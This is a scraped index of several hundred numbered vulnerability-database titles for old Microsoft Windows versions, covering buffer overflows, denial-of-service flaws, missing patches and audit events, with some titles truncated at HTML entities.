[22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21625] Microsoft Windows kerberos message denial of service [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17646] Microsoft Windows RPC Runtime Library obtain information [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13426] Microsoft Windows 2000 and XP RPC race condition [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13129] Microsoft Windows RPCSS DCOM buffer overflows [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12679] Microsoft Windows RPC DCOM denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5222] Microsoft Windows 2000 malformed RPC packet denial of service [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] 